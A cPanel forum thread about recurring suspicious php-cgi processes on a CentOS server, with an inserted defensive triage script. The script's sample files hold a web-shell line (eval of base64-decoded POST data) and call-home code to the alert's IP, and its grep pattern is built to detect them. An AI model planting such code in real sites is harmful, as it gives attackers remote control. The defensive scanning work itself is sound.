Suspicious process running under user
Hello,
I have a server with CentOS 7.4.
My firewall gives me the messages below.
I run maldet and erase all the threats, and a few days later it comes back.
I don't know how to prevent these threats.
Thank you.
--------------------------------------------------------
Suspicious process running under user... (always different users)
Executable:
/opt/cpanel/ea-php56/root/usr/bin/php-cgi
Command Line (often faked in exploits):
/opt/cpanel/ea-php56/root/usr/bin/php-cgi
Network connections by the process (if any):
tcp: 192.99.39.58:60352 -> 69.30.221.50:80
Files open by the process (if any):
/var/cpanel/locale/en.cdb
The path is valid. It's not a suspicious process, so you have to add this path to the firewall ignore list. Please check the same post: Suspicious process running under
Hello, keep in mind the notification you are referencing comes from CSF/LFD as opposed to cPanel. If the traffic is malicious, some of the solutions referenced on the following threads should help: "Prevent wordpress Brute Force Attacks" and "Outbound wp-login.php brute force attack from my cpanel server". Thank you.
Even if the path is valid, I don't think it's legit. I don't understand why accounts would start to launch a bunch of requests.
Hello, were you able to review my previous response regarding this issue (it's after the initial response you received from another user)? Thank you.
I did, but weirdly the users which are making these connections are not using WordPress. I'm really lost and don't know what to do.
Hello, you will sometimes see this type of activity when a PHP script is making a connection to an update server for automatic updates to the script. You can review the PHP files uploaded to the account referenced in the notification to see if it's using any specific PHP scripts that make outgoing connections to the referenced IP address. You may also want to reach out to the individual account holder to request information about the activity. If you require additional help, you can find a list of system administration services on the following URL: System Administration Services | cPanel Forums. Thank you.
Actually, these scripts are launched from users that don't even have any activity besides email. No website or anything else. And the script starts multiple processes with the same user, all targeting the same IP. And if I suspend the user, a few hours later it starts with another user. I also had some who were sending spam, but I disabled mail in PHP so I don't have this problem anymore. I am convinced that it's malicious, but I just don't know how to get rid of it.
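The triage the two posts above call for (checking what a flagged php-cgi process is really running, since the "Command Line" in the alert is argv and can be faked, and reviewing an account's PHP files for references to the alert's destination IP), as an added example that is not part of the thread and is not cPanel or CSF code. It assumes a Linux host with /proc and GNU find/grep; the destination IP 69.30.221.50 is taken from the alert in the first post, the directory tree it scans is constructed inline rather than real account data, and the function names are made up for this example.

```shell
#!/bin/sh
# Added triage helpers for a CSF/LFD "Suspicious process" alert (example code,
# not from the thread). Function names and the sample tree are invented here.

# 1) Look at what a flagged PID is really doing. The alert's "Command Line" is
#    argv, which a dropped script can overwrite; /proc/PID/exe, cwd, the parent
#    and the FastCGI environment (SCRIPT_FILENAME) are harder to fake.
inspect_pid() {
    pid="$1"
    [ -d "/proc/$pid" ] || { echo "no such pid: $pid" >&2; return 1; }
    echo "exe:  $(readlink "/proc/$pid/exe" 2>/dev/null)"
    echo "cwd:  $(readlink "/proc/$pid/cwd" 2>/dev/null)"
    echo "ppid: $(awk '/^PPid:/ {print $2}' "/proc/$pid/status")"
    echo "argv: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    # Only present for php-cgi started by the web server; absent for a shell.
    tr '\0' '\n' < "/proc/$pid/environ" 2>/dev/null \
        | grep -E '^(SCRIPT_FILENAME|DOCUMENT_ROOT|REMOTE_ADDR|PWD)=' || true
    return 0
}

# 2) Grep an account's PHP files for the alert's destination IP and for the
#    primitives a dropped call-home script or web shell needs. Prints
#    path:line:text for every matching line.
scan_php_for_indicators() {
    dir="$1"
    ip_re=$(printf '%s' "$2" | sed 's/\./\\./g')   # 69.30.221.50 -> 69\.30\.221\.50
    pattern="${ip_re}|(curl_init|fsockopen|stream_socket_client)[[:space:]]*\(|(eval|assert)[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)"
    find "$dir" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) \
        -exec grep -HnE "$pattern" {} +
}

# Number of matching lines, for scripting (0 means nothing found).
count_indicators() {
    scan_php_for_indicators "$1" "$2" | wc -l | tr -d ' '
}

# Constructed sample tree (NOT real account data): one clean file, one dropped
# file under a WordPress uploads dir, one hidden file in a mail-only account.
make_sample_tree() {
    base="$1"
    mkdir -p "$base/public_html/wp-content/uploads" "$base/mail"
    cat > "$base/public_html/index.php" <<'EOF'
<?php
echo "hello";
EOF
    cat > "$base/public_html/wp-content/uploads/cache.php" <<'EOF'
<?php
$c = curl_init("http://69.30.221.50/gate.php");
eval(base64_decode($_POST["k"]));
EOF
    cat > "$base/mail/.x.php" <<'EOF'
<?php
$host = "69.30.221.50";
$s = fsockopen($host, 80);
EOF
    # Same IP in a non-PHP file: ignored by the scan on purpose.
    printf 'contact 69.30.221.50 for support\n' > "$base/public_html/notes.txt"
}

# Demo on the constructed tree. On the real server use the PID from the alert
# (or from: ps -u USER -o pid,ppid,etime,cmd) and the account's home directory:
#   inspect_pid <pid>; scan_php_for_indicators /home/USER 69.30.221.50
demo=$(mktemp -d)
make_sample_tree "$demo"
scan_php_for_indicators "$demo" 69.30.221.50
echo "hits: $(count_indicators "$demo" 69.30.221.50)"   # 4
[ -d "/proc/$$" ] && inspect_pid "$$"
rm -rf "$demo"
```

The file scan deliberately flags the call-out and eval-of-decoded-payload primitives even when the IP is absent, so it still finds a dropped script after the operator changes the destination; expect some false positives on legitimate plugins that use curl_init, and read each hit rather than deleting on sight. If inspect_pid shows a cwd or SCRIPT_FILENAME under an account that has no website (as in the post above), that file and its owner's cron entries and recent logins are the next things to look at.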
Hello, I recommend seeking out assistance from a qualified system administrator if you'd like further investigation into what could be causing the issue on the affected server. We provide a list of companies offering system administration services in the URL from my last response. Thank you.
Can you recommend one of them to me, please?
Hello, it's against our policy to recommend a specific vendor, but you are welcome to search their company names on a search engine or another forum such as WebHostingTalk to see if you can find existing reviews. Thank you.